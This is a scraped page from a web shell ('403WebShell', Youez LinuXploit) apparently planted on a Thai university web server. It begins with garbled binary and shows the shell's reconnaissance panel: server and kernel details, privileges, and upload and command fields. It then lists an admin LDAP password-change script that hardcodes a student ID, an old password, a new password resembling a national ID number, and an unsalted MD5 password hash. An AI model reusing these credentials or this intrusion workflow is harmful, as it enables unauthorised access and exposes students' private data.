h(  ) ($6;EbBLkfu�_l� ''8;DUFKV3Dd#,?ANk&5G$/(5M\^�ms����Sb�,;R''6c2I�!\����kx�Ve�[i��Me�IYO7:nOL~�Kr�qrv�I:�BM�y��s}r��K����x)1�6@r*2�89ma��&��'ti������{~#������t)1�2<�0:^5�W.uFzQ/u}�v��vv�u��U37yDJeEJo(/�5Ds'1�:Jlu�iy�iy�hw�1;:S`^BMLOQQn,4�7C�8C�>Lfe�]k�[i�Zg��IW�LZ�EP;,.��Tc�q(0) G,/]/1����w�r��l&-t*3�<<�u��#����j&.u��J68\8?"#$%&'()*+,-./0 ! 
Notice: Undefined index: dl in /var/www/html/web/simple.mini.php on line 1
403WebShell
403Webshell
Server IP : 10.254.12.21  /  Your IP : 10.254.12.21
Web Server : Apache/2.4.6 (CentOS) OpenSSL/1.0.2k-fips PHP/5.6.40
System : Linux arit.skru.ac.th 3.10.0-1160.76.1.el7.x86_64 #1 SMP Wed Aug 10 16:21:17 UTC 2022 x86_64
User : apache ( 48)
PHP Version : 5.6.40
Disable Function : NONE
MySQL : ON  |  cURL : ON  |  WGET : OFF  |  Perl : ON  |  Python : ON  |  Sudo : ON  |  Pkexec : ON
Directory :  /proc/5800/root/var/www/html/sb2/pages/admin/

Upload File :
current_dir [ Writeable ] document_root [ Writeable ]

 

Command :

[ Back ]     

Current File : /proc/5800/root/var/www/html/sb2/pages/admin/ldap.php
<?php
$ldaphost = "172.17.3.12";
$ldapport = 389;
$ldapconn = ldap_connect($ldaphost, $ldapport)  or die("Could not connect to LDAP server.");
ldap_set_option($ldapconn, LDAP_OPT_PROTOCOL_VERSION, 3);
ldap_set_option($ldapconn, LDAP_OPT_REFERRALS, 0);

// connect to ldap server
if ($ldapconn) {
//$name = $_POST["user"];// ค่าจาก textbox user
//$ldappass = $_POST["passwd"]; // ค่าจาก textbox password
//$newpwd1 = $_POST["newpasswd1"];// ค่าจาก textbox  ใส่รหัสผ่านใหม่
//$newpwd2 = $_POST["newpasswd2"]; // ค่าจาก textbox ใส่รหัสผ่านใหม่อีกครั้ง
$name = "654101002";
$ldappass = "123456789"; // ค่าจาก textbox password
$newpwd1 = "1919900340213";
$newpwd2 = "1919900340213";
$ldaprdn ="uid=$name,ou=Students,dc=Songkhla Rajabhat University,o=AC,c=TH";   //ou=Person  เปลี่ยนเป็น ou ของนักศึกษา

// binding to ldap server 
$ldapbind = ldap_bind($ldapconn, $ldaprdn, $ldappass); 

// verify binding 
 if ($ldapbind) {  
        if(($newpwd1 == "") or ($newpwd1!=$newpwd2)) {
	        echo "คุณยังไม่ได้ป้อนรหัสผ่านใหม่หรือป้อนรหัสผ่านใหม่ไม่ถูกต้อง";
		echo "<br><br><a href='/..'>ทำการเปลี่ยน Passwordใหม่</a>";
        } else {
        	$cryptdpass = base64_encode(pack("H*",md5($newpwd1)));
		$data["userPassword"] = "{MD5}$cryptdpass";
        	$ldapmodify = ldap_modify($ldapconn, $ldaprdn, $data);
		ldap_unbind($ldapconn);
		echo "<p>ได้ดำเนินการเปลี่ยน Password ของ <b>$name</b> เรียบร้อยแล้ว.";
		echo "<br><br><a href='http://www.skru.ac.th/'>กลับาสู่หน้าเว็บไซต์มหาวิทยาลัย</a>";
	}
 } else { 
        echo "ไม่สามารถเชื่อมต่อ Ldap Server ได้ เนื่องจาก ชื่อผู้ใช้ หรือ รหัสผ่าน ไม่ถูกต้อง..."; 
	echo "<br><br><a href='/..'>ทำการเปลี่ยน Passwordใหม่</a>";
 } //if ($ldapbind) {  
} //if ($ldapconn) {
?>

Youez - 2016 - github.com/yon3zu
LinuXploit